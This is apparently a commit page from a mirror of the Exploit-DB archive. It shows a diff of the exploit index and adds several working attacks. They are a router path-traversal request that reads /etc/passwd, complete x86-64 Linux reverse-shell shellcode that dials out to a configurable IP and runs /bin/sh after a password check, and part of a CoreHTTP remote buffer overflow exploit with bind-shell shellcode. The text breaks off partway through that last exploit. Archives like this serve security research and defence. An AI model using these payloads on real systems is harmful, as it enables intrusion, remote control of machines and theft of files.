bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2016-01-07

Browse source 
10 new exploits
This commit is contained in:
Offensive Security 2016-01-07 05:01:40 +00:00
parent cf1ca0a5f7
commit 53d9096a7c
14 changed files with 1707 additions and 611 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

34
files.csv
View file

@ -1505,7 +1505,7 @@ id,file,description,date,author,platform,type,port
1791,platforms/multiple/remote/1791.patch,"RealVNC 4.1.0 - 4.1.1 - VNC Null Authentication Bypass (Patch EXE)",2006-05-16,redsand,multiple,remote,5900
1792,platforms/windows/dos/1792.txt,"GNUnet <= 0.7.0d - (Empty UDP Packet) Remote Denial of Service Exploit",2006-05-15,"Luigi Auriemma",windows,dos,0
1793,platforms/php/webapps/1793.pl,"DeluxeBB <= 1.06 (name) Remote SQL Injection Exploit (mq=off)",2006-05-15,KingOfSka,php,webapps,0
1794,platforms/multiple/remote/1794.pm,"RealVNC 4.1.0 - 4.1.1 (Null Authentication) Auth Bypass Exploit (meta)",2006-05-15,"H D Moore",multiple,remote,5900
1794,platforms/multiple/remote/1794.pm,"RealVNC 4.1.0 - 4.1.1 - (Null Authentication) Auth Bypass Exploit (meta)",2006-05-15,"H D Moore",multiple,remote,5900
1795,platforms/php/webapps/1795.txt,"ezusermanager <= 1.6 - Remote File Inclusion Vulnerability",2006-05-15,OLiBekaS,php,webapps,0
1796,platforms/php/webapps/1796.php,"PHP-Fusion <= 6.00.306 (srch_where) SQL Injection Exploit",2006-05-16,rgod,php,webapps,0
1797,platforms/php/webapps/1797.php,"DeluxeBB <= 1.06 (Attachment mod_mime) Remote Exploit",2006-05-16,rgod,php,webapps,0
@ -3888,7 +3888,7 @@ id,file,description,date,author,platform,type,port
4240,platforms/windows/remote/4240.html,"VMware IntraProcessLogging.dll 5.5.3.42958 - Arbitrary Data Write Exploit",2007-07-28,callAX,windows,remote,0
4241,platforms/php/webapps/4241.txt,"PHP123 Top Sites (category.php cat) Remote SQL Injection Vuln",2007-07-28,t0pP8uZz,php,webapps,0
4242,platforms/php/webapps/4242.php,"LinPHA <= 1.3.1 (new_images.php) Remote Blind SQL Injection Exploit",2007-07-29,EgiX,php,webapps,0
4243,platforms/linux/remote/4243.c,"corehttp 0.5.3alpha (httpd) Remote Buffer Overflow Exploit",2007-07-29,vade79,linux,remote,80
4243,platforms/linux/remote/4243.c,"CoreHTTP 0.5.3alpha (httpd) - Remote Buffer Overflow Exploit",2007-07-29,vade79,linux,remote,80
4244,platforms/windows/remote/4244.html,"VMware Inc 6.0.0 (vielib.dll 2.2.5.42958) Remode Code Execution Exploit",2007-07-29,callAX,windows,remote,0
4245,platforms/windows/remote/4245.html,"VMware Inc 6.0.0 CreateProcess Remote Code Execution Exploit",2007-07-30,callAX,windows,remote,0
4246,platforms/php/webapps/4246.txt,"wolioCMS Auth Bypass / Remote SQL Injection Vulnerabilities",2007-07-30,k1tk4t,php,webapps,0
@ -7474,7 +7474,7 @@ id,file,description,date,author,platform,type,port
7940,platforms/php/webapps/7940.txt,"WholeHogSoftware Ware Support (Auth Bypass) SQL Injection Vuln",2009-02-02,ByALBAYX,php,webapps,0
7941,platforms/php/webapps/7941.txt,"WholeHogSoftware Password Protect (Auth Bypass) SQL Injection Vuln",2009-02-02,ByALBAYX,php,webapps,0
7942,platforms/windows/dos/7942.pl,"Elecard AVC HD PLAYER (m3u/xpl file) Local Stack Overflow PoC",2009-02-02,AlpHaNiX,windows,dos,0
7943,platforms/windows/dos/7943.py,"RealVNC 4.1.2 (vncviewer.exe) RFB Protocol Remote Code Execution PoC",2009-02-02,"Andres Luksenberg",windows,dos,0
7943,platforms/windows/dos/7943.py,"RealVNC 4.1.2 - (vncviewer.exe) RFB Protocol Remote Code Execution PoC",2009-02-02,"Andres Luksenberg",windows,dos,0
7944,platforms/php/webapps/7944.php,"phpBLASTER 1.0 RC1 (blaster_user) Blind SQL Injection Exploit",2009-02-02,darkjoker,php,webapps,0
7945,platforms/php/webapps/7945.php,"CMS Mini <= 0.2.2 - Remote Command Execution Exploit",2009-02-02,darkjoker,php,webapps,0
7946,platforms/php/webapps/7946.txt,"sourdough 0.3.5 - Remote File Inclusion Vulnerability",2009-02-02,ahmadbady,php,webapps,0
@ -9632,7 +9632,7 @@ id,file,description,date,author,platform,type,port
10345,platforms/windows/local/10345.py,"gAlan - (.galan) Universal Buffer Overflow Exploit",2009-12-07,Dz_attacker,windows,local,0
10346,platforms/windows/local/10346.rb,"gAlan 0.2.1 - Universal Buffer Overflow Exploit (meta)",2009-12-07,loneferret,windows,local,0
10347,platforms/hardware/webapps/10347.txt,"Barracuda IMFirewall 620 Vulnerability",2009-12-07,Global-Evolution,hardware,webapps,0
10349,platforms/linux/dos/10349.py,"CoreHTTP Web server off-by-one Buffer Overflow Vulnerability",2009-12-02,"Patroklos Argyroudis",linux,dos,80
10349,platforms/linux/dos/10349.py,"CoreHTTP Web server <= 0.5.3.1 - off-by-one Buffer Overflow Vulnerability",2009-12-02,"Patroklos Argyroudis",linux,dos,80
10350,platforms/php/webapps/10350.txt,"IRAN N.E.T E-commerce Group SQL Injection Vulnerability",2009-12-08,"Dr.0rYX AND Cr3W-DZ",php,webapps,0
10351,platforms/php/webapps/10351.txt,"MarieCMS 0.9 - LFI & RFI & XSS Vulnerabilities",2009-12-07,"Amol Naik",php,webapps,0
10352,platforms/hardware/dos/10352.txt,"TANDBERG F8.2 / F8.0 / F7.2 / F6.3 - Remote Denial of Service",2009-12-06,otokoyama,hardware,dos,0
@ -14291,7 +14291,7 @@ id,file,description,date,author,platform,type,port
16486,platforms/windows/remote/16486.rb,"Novell NetMail <= 3.52d - IMAP AUTHENTICATE Buffer Overflow",2010-05-09,metasploit,windows,remote,0
16487,platforms/windows/remote/16487.rb,"Ipswitch IMail IMAP SEARCH Buffer Overflow",2010-06-15,metasploit,windows,remote,0
16488,platforms/windows/remote/16488.rb,"Novell NetMail <= 3.52d IMAP APPEND Buffer Overflow",2010-05-09,metasploit,windows,remote,0
16489,platforms/windows/remote/16489.rb,"RealVNC 3.3.7 Client Buffer Overflow",2010-04-30,metasploit,windows,remote,0
16489,platforms/windows/remote/16489.rb,"RealVNC 3.3.7 - Client Buffer Overflow",2010-04-30,metasploit,windows,remote,0
16490,platforms/windows/remote/16490.rb,"UltraVNC 1.0.1 Client Buffer Overflow",2010-04-30,metasploit,windows,remote,0
16491,platforms/windows/remote/16491.rb,"WinVNC Web Server <= 3.3.3r7 - GET Overflow",2009-12-06,metasploit,windows,remote,0
16492,platforms/windows/remote/16492.rb,"Novell iPrint Client ActiveX Control ExecuteRequest debug Buffer Overflow",2010-09-21,metasploit,windows,remote,0
@ -15389,7 +15389,7 @@ id,file,description,date,author,platform,type,port
17715,platforms/windows/local/17715.html,"F-Secure Multiple Products ActiveX SEH Overwrite Vulnerability (Heap Spray)",2011-08-24,41.w4r10r,windows,local,0
17716,platforms/php/webapps/17716.txt,"WordPress SendIt plugin <= 1.5.9 - Blind SQL Injection Vulnerability",2011-08-25,evilsocket,php,webapps,0
17718,platforms/windows/dos/17718.pl,"Groovy Media Player 2.6.0 - (.m3u) Local Buffer Overflow PoC",2011-08-26,"D3r K0n!G",windows,dos,0
17719,platforms/windows/remote/17719.rb,"RealVNC Authentication Bypass",2011-08-26,metasploit,windows,remote,0
17719,platforms/windows/remote/17719.rb,"RealVNC - Authentication Bypass",2011-08-26,metasploit,windows,remote,0
17720,platforms/php/webapps/17720.txt,"WordPress Photoracer plugin <= 1.0 - SQL Injection Vulnerability",2011-08-26,evilsocket,php,webapps,0
17721,platforms/windows/remote/17721.rb,"Sunway Force Control SCADA 6.1 SP3 httpsrv.exe Exploit",2011-08-26,"Canberk BOLAT",windows,remote,0
17722,platforms/php/webapps/17722.rb,"Jcow Social Networking Script 4.2 <= 5.2 - Arbitrary Code Execution",2011-08-26,"Aung Khant",php,webapps,0
@ -15648,7 +15648,7 @@ id,file,description,date,author,platform,type,port
18012,platforms/multiple/webapps/18012.txt,"Metasploit 4.1.0 Web UI stored XSS Vulnerability",2011-10-20,"Stefan Schurtz",multiple,webapps,0
18013,platforms/windows/webapps/18013.py,"Cyclope Internet Filtering Proxy 4.0 - Stored XSS",2011-10-20,loneferret,windows,webapps,0
18014,platforms/windows/dos/18014.html,"Opera <= 11.51 Use After Free Crash PoC",2011-10-21,"Roberto Suggi Liverani",windows,dos,0
18015,platforms/cgi/remote/18015.rb,"HP Power Manager 'formExportDataLogs' Buffer Overflow",2011-10-20,metasploit,cgi,remote,0
18015,platforms/cgi/remote/18015.rb,"HP Power Manager - 'formExportDataLogs' Buffer Overflow",2011-10-20,metasploit,cgi,remote,0
18016,platforms/windows/remote/18016.txt,"Oracle AutoVue 20.0.1 AutoVueX - ActiveX Control SaveViewStateToFile Vulnerability",2011-10-21,rgod,windows,remote,0
18017,platforms/windows/dos/18017.py,"Cyclope Internet Filtering Proxy 4.0 - CEPMServer.exe DoS (Poc)",2011-10-21,loneferret,windows,dos,0
18018,platforms/php/webapps/18018.php,"Sports PHool <= 1.0 - Remote File Include Exploit",2011-10-21,"cr4wl3r ",php,webapps,0
@ -16881,7 +16881,7 @@ id,file,description,date,author,platform,type,port
19512,platforms/linux/local/19512.sh,"Mandriva Linux Mandrake 6.0_Gnome Libs 1.0.8 espeaker - Local Buffer Overflow",1999-09-26,"Brock Tellier",linux,local,0
19513,platforms/hardware/dos/19513.txt,"Eicon Networks DIVA LAN ISDN Modem 1.0 Release 2.5/1.0/2.0 - DoS",1999-09-27,"Bjorn Stickler",hardware,dos,0
19514,platforms/windows/remote/19514.txt,"Adobe Acrobat ActiveX Control 1.3.188 - ActiveX Buffer Overflow",1999-09-27,"Shane Hird",windows,remote,0
19515,platforms/windows/remote/19515.txt,"Microsoft Internet Explorer 4.0 for Windows 95/Windows NT 4 Setupctl ActiveX Control Buffer Overflow",1999-09-27,"Shane Hird",windows,remote,0
19515,platforms/windows/remote/19515.txt,"Microsoft Internet Explorer 4.0 for Windows 95/Windows NT 4 - Setupctl ActiveX Control Buffer Overflow",1999-09-27,"Shane Hird",windows,remote,0
19516,platforms/windows/local/19516.txt,"Microsoft MSN Messenger Service 1.0 Setup BBS ActiveX Control Buffer Overflow",1999-09-27,"Shane Hird",windows,local,0
19517,platforms/linux/local/19517.pl,"Emesene 2.12.5 - Password Disclosure",2012-07-01,"Daniel Godoy",linux,local,0
19793,platforms/php/webapps/19793.txt,"Magento eCommerce Local File Disclosure",2012-07-13,"SEC Consult",php,webapps,0
@ -30264,7 +30264,7 @@ id,file,description,date,author,platform,type,port
33549,platforms/linux/dos/33549.txt,"OpenOffice 3.1 - (.slk) NULL Pointer Dereference Remote Denial of Service Vulnerability",2010-01-19,"Hellcode Research",linux,dos,0
33550,platforms/php/webapps/33550.txt,"VisualShapers ezContents <= 2.0.3 - Authentication Bypass and Multiple SQL Injection Vulnerabilities",2010-01-19,"AmnPardaz Security Research Team",php,webapps,0
33551,platforms/php/webapps/33551.txt,"PHPMySpace Gold 8.0 - 'gid' Parameter SQL Injection Vulnerability",2010-01-20,Ctacok,php,webapps,0
33552,platforms/windows/remote/33552.txt,"Microsoft Internet Explorer 8 URI Validation Remote Code Execution Vulnerability",2010-01-21,"Lostmon Lords",windows,remote,0
33552,platforms/windows/remote/33552.txt,"Microsoft Internet Explorer 8 - URI Validation Remote Code Execution Vulnerability",2010-01-21,"Lostmon Lords",windows,remote,0
33553,platforms/multiple/remote/33553.txt,"Sun Java System Web Server 6.1/7.0 Digest Authentication Remote Buffer Overflow Vulnerability",2010-01-21,Intevydis,multiple,remote,0
33554,platforms/linux/remote/33554.py,"TORQUE Resource Manager 2.5.x-2.5.13 - Stack Based Buffer Overflow Stub",2014-05-28,bwall,linux,remote,0
33555,platforms/php/webapps/33555.txt,"AuraCMS 3.0 - Multiple Vulnerabilities",2014-05-28,"Mustafa ALTINKAYNAK",php,webapps,0
@ -32648,7 +32648,7 @@ id,file,description,date,author,platform,type,port
36206,platforms/windows/remote/36206.rb,"Persistent Systems Client Automation Command Injection RCE",2015-02-27,"Ben Turner",windows,remote,3465
36207,platforms/windows/local/36207.py,"Microsoft Office Word 2007 - RTF Object Confusion (ASLR and DEP Bypass)",2015-02-28,R-73eN,windows,local,0
36208,platforms/php/webapps/36208.txt,"vtiger CRM 5.2 'onlyforuser' Parameter SQL Injection Vulnerability",2011-10-15,"Aung Khant",php,webapps,0
36209,platforms/windows/remote/36209.html,"Microsoft Internet Explorer 8 Select Element Memory Corruption Vulnerability",2011-10-11,"Ivan Fratric",windows,remote,0
36209,platforms/windows/remote/36209.html,"Microsoft Internet Explorer 8 - Select Element Memory Corruption Vulnerability",2011-10-11,"Ivan Fratric",windows,remote,0
36262,platforms/windows/webapps/36262.txt,"Solarwinds Orion Service - SQL Injection Vulnerabilities",2015-03-04,"Brandon Perry",windows,webapps,0
36263,platforms/linux/remote/36263.rb,"Symantec Web Gateway 5 restore.php Post Authentication Command Injection",2015-03-04,metasploit,linux,remote,443
36211,platforms/windows/dos/36211.txt,"Microsoft Host Integration Server 2004-2010 - Remote Denial Of Service Vulnerability",2011-04-11,"Luigi Auriemma",windows,dos,0
@ -33335,7 +33335,7 @@ id,file,description,date,author,platform,type,port
36929,platforms/jsp/webapps/36929.txt,"Ilient SysAid 8.5.5 Multiple Cross Site Scripting and HTML Injection Vulnerabilities",2012-03-08,"Julien Ahrens",jsp,webapps,0
36930,platforms/multiple/webapps/36930.txt,"Wordpress Freshmail Unauthenticated SQL Injection",2015-05-07,"Felipe Molina",multiple,webapps,0
36931,platforms/hardware/remote/36931.txt,"Barracuda CudaTel Communication Server 2.0.029.1 Multiple HTML Injection Vulnerabilities",2012-03-08,"Benjamin Kunz Mejri",hardware,remote,0
36932,platforms/windows/remote/36932.py,"RealVNC 4.1.0 and 4.1.1 Authentication Bypass Exploit",2012-05-13,fdiskyou,windows,remote,5900
36932,platforms/windows/remote/36932.py,"RealVNC 4.1.0 and 4.1.1 - Authentication Bypass Exploit",2012-05-13,fdiskyou,windows,remote,5900
36933,platforms/linux/remote/36933.py,"ShellShock dhclient Bash Environment Variable Command Injection PoC",2014-09-29,fdiskyou,linux,remote,0
36934,platforms/asp/webapps/36934.txt,"SAP Business Objects InfoVew System listing.aspx searchText Parameter XSS",2012-03-08,vulns@dionach.com,asp,webapps,0
36935,platforms/asp/webapps/36935.txt,"SAP Business Objects InfoView System /help/helpredir.aspx guide Parameter XSS",2012-03-08,vulns@dionach.com,asp,webapps,0
@ -35399,13 +35399,15 @@ id,file,description,date,author,platform,type,port
39145,platforms/cgi/webapps/39145.txt,"Xangati XSR And XNR 'gui_input_test.pl' Remote Command Execution Vulnerability",2014-04-14,"Jan Kadijk",cgi,webapps,0
39146,platforms/php/webapps/39146.txt,"Jigowatt PHP Event Calendar 'day_view.php' SQL Injection Vulnerability",2014-04-14,"Daniel Godoy",php,webapps,0
39147,platforms/osx/local/39147.c,"Apple Mac OS X Local Security Bypass Vulnerability",2014-04-22,"Ian Beer",osx,local,0
39150,platforms/php/webapps/39150.txt,"Open Audit SQL Injection Vulnerability",2016-01-02,"Rahul Pratap Singh",php,webapps,0
39151,platforms/lin_x86-64/shellcode/39151..c,"x86_64 Linux bind TCP port shellcode",2016-01-02,Scorpion_,lin_x86-64,shellcode,0
39152,platforms/linux/shellcode/39152..c,"tcp bindshell with password prompt in 162 bytes",2016-01-02,"Sathish kumar",linux,shellcode,0
39152,platforms/linux/shellcode/39152..c,"TCP Bindshell with Password Prompt - 162 bytes",2016-01-02,"Sathish kumar",linux,shellcode,0
39153,platforms/php/webapps/39153.txt,"iDevAffiliate 'idevads.php' SQL Injection Vulnerability",2014-04-22,"Robert Cooper",php,webapps,0
39154,platforms/hardware/remote/39154.txt,"Comtrend CT-5361T Router password.cgi Admin Password Manipulation CSRF",2014-04-21,"TUNISIAN CYBER",hardware,remote,0
39155,platforms/linux/remote/39155.txt,"lxml 'clean_html' Function Security Bypass Vulnerability",2014-04-15,"Maksim Kochkin",linux,remote,0
39156,platforms/cgi/webapps/39156.txt,"ZamFoo Multiple Remote Command Execution Vulnerabilities",2014-04-02,Al-Shabaab,cgi,webapps,0
39157,platforms/php/webapps/39157.txt,"Puntopy 'novedad.php' SQL Injection Vulnerability",2014-04-06,"Felipe Andrian Peixoto",php,webapps,0
39159,platforms/windows/local/39159.py,"FTPShell Client 5.24 - Add to Favorites Buffer Overflow",2016-01-04,INSECT.B,windows,local,0
39161,platforms/windows/remote/39161.py,"Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution",2016-01-04,"Avinash Thapa",windows,remote,0
39162,platforms/multiple/dos/39162.txt,"pdfium CPDF_DIBSource::DownSampleScanline32Bit - Heap-Based Out-of-Bounds Read",2016-01-04,"Google Security Research",multiple,dos,0
39163,platforms/multiple/dos/39163.txt,"pdfium CPDF_TextObject::CalcPositionData - Heap-Based Out-of-Bounds Read",2016-01-04,"Google Security Research",multiple,dos,0
@ -35422,3 +35424,11 @@ id,file,description,date,author,platform,type,port
39175,platforms/multiple/remote/39175.py,"AssistMyTeam Team Helpdesk Multiple Information Disclosure Vulnerabilities",2014-05-05,bhamb,multiple,remote,0
39176,platforms/php/webapps/39176.html,"TOA Cross Site Request Forgery Vulnerability",2014-05-08,"High-Tech Bridge",php,webapps,0
39177,platforms/multiple/dos/39177.py,"VLC Media Player '.wav' File Memory Corruption Vulnerability",2014-05-09,"Aryan Bayaninejad",multiple,dos,0
39178,platforms/php/webapps/39178.txt,"CMS Touch pages.php Page_ID Parameter SQL Injection",2014-05-08,indoushka,php,webapps,0
39179,platforms/php/webapps/39179.txt,"CMS Touch news.php News_ID Parameter SQL Injection",2014-05-08,indoushka,php,webapps,0
39180,platforms/windows/dos/39180.pl,"Winamp '.flv' File Processing Memory Corruption Vulnerability",2014-05-16,"Aryan Bayaninejad",windows,dos,0
39181,platforms/windows/dos/39181.py,"Intel Indeo Video Memory Corruption Vulnerability",2014-05-16,"Aryan Bayaninejad",windows,dos,0
39182,platforms/multiple/dos/39182.py,"RealPlayer '.3gp' File Processing Memory Corruption Vulnerability",2014-05-16,"Aryan Bayaninejad",multiple,dos,0
39183,platforms/windows/dos/39183.py,"ALLPlayer '.wav' File Processing Memory Corruption Vulnerability",2014-05-16,"Aryan Bayaninejad",windows,dos,0
39184,platforms/hardware/webapps/39184.txt,"MediaAccess TG788vn - Unauthenticated File Disclosure",2016-01-06,0x4148,hardware,webapps,0
39185,platforms/lin_x86-64/shellcode/39185.c,"TCP Reverse Shell with Password Prompt - 151 bytes",2016-01-06,"Sathish kumar",lin_x86-64,shellcode,0

Can't render this file because it is too large.

32
platforms/hardware/webapps/39184.txt Executable file
View file

@ -0,0 +1,32 @@
Vulnerable hardware : MediaAccess TG788vn with Cisco http firewall
Author : Ahmed Sultan (0x4148)
Email : 0x4148@gmail.com
MediaAccess TG788vn with Cisco firewall http config is vulnerable to
critical unauthenticated file disclosure flaw,
POC
Request:
POST /scgi-bin/platform.cgi HTTP/1.1
Host: xx.xx.xx.xx
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://xx.xx.xx.xx/scgi-bin/platform.cgi
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 164
button.login.home=Se%20connecter&Login.userAgent=0x4148_Fu&reload=0&SSLVPNUser.Password=0x4148Fu&SSLVPNUser.UserName=0x4148&thispage=../../../../../../etc/passwd%00
Response:
HTTP/1.0 200 OK
Date: Sat, 01 Jan 2011 00:00:45 GMT
Server: Embedded HTTP Server.
Connection: close
loic_ipsec:x:500:500:xauth:/:/bin/cli
the http server is running with root privileges , which mean that the
attacker might escalate the exploit for further critical attacks

184
platforms/lin_x86-64/shellcode/39185.c Executable file
View file

@ -0,0 +1,184 @@
/*---------------------------------------------------------------------------------------------------------------------
/*
*Title: tcp reverse shell with password prompt in 151 bytes
*Author: Sathish kumar
*Contact: https://www.linkedin.com/in/sathish94
* Copyright: (c) 2016 iQube. (http://iQube.io)
* Release Date: January 6, 2016
*Description: x64 Linux reverse TCP port shellcode on port 4444 with reconfigurable password
*Tested On: Ubuntu 14.04 LTS
*SLAE64-1408
*Build/Run: gcc -fno-stack-protector -z execstack bindshell.c -o bindshell
* ./bindshell
* nc localhost 4444
*
*/
/*
* NOTE: This C code binds on port 4444
* The top of this file contains the .nasm source code
* The Port can be Reconfigured According to your needs
* Instructions for changing port number
* Port obtainer change the port value accorddingly
* port.py
* import socket
* port = 4444
* hex(socket.htons(port))
* python port.py
* Result : 0x5c11
* Replace the obtained value in the shellcode to change the port number
* For building the from .nasm source use
* nasm -felf64 filename.nasm -o filename.o
* ld filename.o -o filename
* To inspect for nulls
* objdump -M intel -D filename.o
global _start
_start:
jmp sock
prompt: db 'Passcode' ; initilization of prompt data
; sock = socket(AF_INET, SOCK_STREAM, 0)
; AF_INET = 2
; SOCK_STREAM = 1
; syscall number 41
sock:
xor rax, rax ;Xor function will null the values in the register beacuse we doesn't know whats the value in the register in realtime cases
xor rsi, rsi
mul rsi
push byte 0x2 ;pusing argument to the stack
pop rdi ; poping the argument to the rdi instructions on the top of the stack should be remove first because stack LIFO
inc esi ; already rsi is 0 so incrementing the rsi register will make it 1
push byte 0x29 ; pushing the syscall number into the rax by using stack
pop rax
syscall
; copying the socket descripter from rax to rdi register so that we can use it further
xchg rax, rdi
; server.sin_family = AF_INET
; server.sin_port = htons(PORT)
; server.sin_addr.s_addr = INADDR_ANY
; bzero(&server.sin_zero, 8)
; setting up the data sctructure
xor rax, rax
push rax ; bzero(&server.sin_zero, 8)
mov ebx , 0xfeffff80 ; ip address 127.0.0.1 "noted" to remove null
not ebx
mov dword [rsp-4], ebx
sub rsp , 4 ; adjust the stack
push word 0x5c11 ; port 4444 in network byte order
push word 0x02 ; AF_INET
push rsp
pop rsi
; connecting to the remote ip
push 0x2a
pop rax
push 0x10
pop rdx
syscall
; initilization of dup2
push 0x3
pop rsi ; setting argument to 3
duplicate:
dec esi
mov al, 0x21 ;duplicate syscall applied to error,output and input using loop
syscall
jne duplicate
xor rax, rax
inc al ; rax register to value 1 syscall for write
push rax
pop rdi ; rdi register to value 1
lea rsi, [rel prompt]
xor rdx, rdx ; xor the rdx register to clear the previous values
push 0xe
pop rdx
syscall
; checking the password using read
password_check:
push rsp
pop rsi
xor rax, rax ; system read syscall value is 0 so rax is set to 0
syscall
push 0x6b636168 ; password to connect to shell is hack which is pushed in reverse and hex encoded
pop rax
lea rdi, [rel rsi]
scasd ; comparing the user input and stored password in the stack
jne Exit
execve: ; Execve format , execve("/bin/sh", 0 , 0)
xor rsi , rsi
mul rsi ; zeroed rax , rdx register
push ax ; terminate string with null
mov rbx , 0x68732f2f6e69622f ; "/bin//sh" in reverse order
push rbx
push rsp
pop rdi ; set RDI
push byte 0x3b ; execve syscall number (59)
pop rax
syscall
Exit:
;Exit shellcode if password is wrong
push 0x3c
pop rax ;syscall number for exit is 60
xor rdi, rdi
syscall
*/
#include<stdio.h>
#include<string.h>
unsigned char code[] = \
"\xeb\x08\x50\x61\x73\x73\x63\x6f\x64\x65\x48\x31\xc0\x48\x31\xf6\x48\xf7\xe6\x6a\x02\x5f\xff\xc6\x6a\x29\x58\x0f\x05\x48\x97\x48\x31\xc0\x50\xbb"
//ip address which can be obtained by
/* example 10.1.75.202
* hex value equivalent = 0a.01.4b.ca
*/
//replace this with the ip address of the system to which the shell should connect
"\x0a\x01\x4b\xca"
"\x89\x5c\x24\xfc\x48\x83\xec\x04\x66\x68"
//Port number this can be obtained from the above instrcutions
"\x11\x5c"
"\x66\x6a\x02\x54\x5e\x6a\x2a\x58\x6a\x10\x5a\x0f\x05\x6a\x03\x5e\xff\xce\xb0\x21\x0f\x05\x75\xf8\x48\x31\xc0\xfe\xc0\x50\x5f\x48\x8d\x35\xa8\xff\xff\xff\x48\x31\xd2\x6a\x0e\x5a\x0f\x05\x54\x5e\x48\x31\xc0\x0f\x05\x68"
//Password this can be obtained by
/*
* python
* password = 'hack'
* (password[::-1]).encode('hex')
* Reuslt : 6b636168
* This is stored in reverse beacuse of stack
*
*
*/
"\x68\x61\x63\x6b"
"\x58\x48\x8d\x3e\xaf\x75\x1a\x48\x31\xf6\x48\xf7\xe6\x66\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\x6a\x3b\x58\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05";
main()
{
printf("Shellcode Length: %d\n", (int)strlen(code));
int (*ret)() = (int(*)())code;
ret();
}

664
platforms/linux/remote/4243.c
View file

@ -1,332 +1,332 @@
/*[ corehttp[v0.5.3alpha]: httpd remote buffer overflow exploit. ]**********
* *
* by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo) *
* *
* compile: *
* gcc xcorehttp.c -o xcorehttp *
* *
* syntax: *
* ./xcorehttp [-r] -h host -p port *
* *
* corehttp homepage/url: *
* http://corehttp.sourceforge.net/ *
* *
* bug(http.c): *
* ----------------------------------------------------------------------- *
* struct sprock_t *HttpSprockMake(struct sprock_t *parentsprock) { *
* struct sprock_t *sprocket; *
* char req[PATHSIZE], url[PATHSIZE], status[PATHSIZE], temp[BUFSIZE], *
* ... *
* if ((sprocket = (struct sprock_t *) *
* malloc(sizeof(struct sprock_t))) == NULL) return NULL; *
* ... *
* sscanf(parentsprock->buffer, "%[A-Za-z] %s%*[ \t\n]", req, url); *
* !(the bug/overwrite) --------------------------------------^----^ *
* strncpy(sprocket->parent->url, url, PATHSIZE); *
* !(the problem) -^ *
* ... *
* for (i = 0; req[i] != '\0'; i++) *
* req[i] = toupper(req[i]); *
* !(another problem) -^ *
* ... *
* } *
* ----------------------------------------------------------------------- *
* *
* explaination: *
* the sscanf() call in the above code contains no bounds checks for *
* writing to either req[] or url[] (i chose url[] as it gave more room *
* to work with, by overwriting into req[], and isnt limited to *
* alphabetical characters only) *
* *
* the first problem is that this overflows into the *sprocket structure *
* pointer, which is used immediately after the overflow. this is *
* automatically calculated in this exploit, using the same location in *
* memory with an offset. (+512 to ret address, which points to the nops) *
* *
* the second problem is all lowercase characters get uppercased, this *
* will happen weither or not you overwrite via req[] or url[]. if the *
* return address contains a lowercase character it will uppercase it. *
* *
* this exploit has 256(%4) bytes of working room, so avoiding lowercase *
* characters should be doable. *
* *
* note: *
* there are two areas in the stack this will appear, the one closer *
* to the top of the stack should be used. *
* *
* example usage: *
* [v9@fhalo v9]$ gcc xcorehttp.c -o xcorehttp *
* [v9@fhalo v9]$ ./xcorehttp -h dual.fakehalo.lan -p 5555 *
* [*] corehttp[v0.5.3alpha]: httpd remote buffer overflow exploit. *
* [*] by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo) *
* *
* [*] target : dual.fakehalo.lan:5555 *
* [*] return address : 0xbfffea60 *
* [*] *sprocket replacement : 0xbfffec60 *
* *
* [*] attempting to connect: dual.fakehalo.lan:5555. *
* [*] successfully connected: dual.fakehalo.lan:5555. *
* [*] sending string: *
* [+] "X [NOPS+SHELLCODEx512]|[ADDR1x16][ADDR2x256]\r\n\r\n" *
* [*] closing connection. *
* *
* [*] attempting to connect: dual.fakehalo.lan:7979. *
* [*] successfully connected: dual.fakehalo.lan:7979. *
* *
* Linux fhlnxd 2.4.22-10mdk #1 Thu Sep 18 12:30:58 CEST 2003 i686 unkn$ *
* uid=501(v9) gid=501(v9) groups=501(v9) *
* *
* (...nothing like a overly complex exploit to quench my brain thirst. *
* although, i didn't do any support for randomized memory addresses, oh *
* well) *
***************************************************************************/
#include <stdio.h>
#include <stdlib.h>
#ifndef __USE_BSD
#define __USE_BSD
#endif
#include <string.h>
#include <strings.h>
#include <signal.h>
#include <unistd.h>
#include <netdb.h>
#include <getopt.h>
#include <ctype.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#define BUFSIZE (2+512+16+256+4)
#define TIMEOUT 10
#define SPORT 7979
#define DFL_RETADDR 0xbfffea60
/* globals. */
/* linux_ia32_bind - LPORT=7979 Size=243 Encoder=PexAlphaNum */
/* http://metasploit.com */
/* filt: 0x00 0x0a 0x0d 0x2b 0x25 0x3f 0x20 0x2f 0x09 (0x61-0x7a) */
static char x86_bind[]=
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x41\x53\x4b\x4d\x43\x35"
"\x43\x44\x43\x35\x4c\x56\x44\x50\x4c\x56\x48\x46\x4a\x45\x49\x39"
"\x49\x48\x41\x4e\x4d\x4c\x42\x38\x48\x49\x43\x44\x44\x35\x48\x36"
"\x4a\x56\x4f\x31\x4b\x52\x48\x46\x43\x45\x49\x48\x41\x4e\x4c\x36"
"\x48\x56\x4a\x35\x42\x55\x41\x55\x48\x55\x49\x48\x41\x4e\x4d\x4c"
"\x42\x48\x42\x4b\x48\x46\x41\x4d\x43\x4e\x4d\x4c\x42\x38\x44\x55"
"\x44\x45\x48\x45\x43\x34\x49\x58\x41\x4e\x42\x4b\x48\x56\x4d\x4c"
"\x42\x38\x43\x39\x4c\x36\x44\x30\x49\x55\x42\x4b\x4f\x53\x4d\x4c"
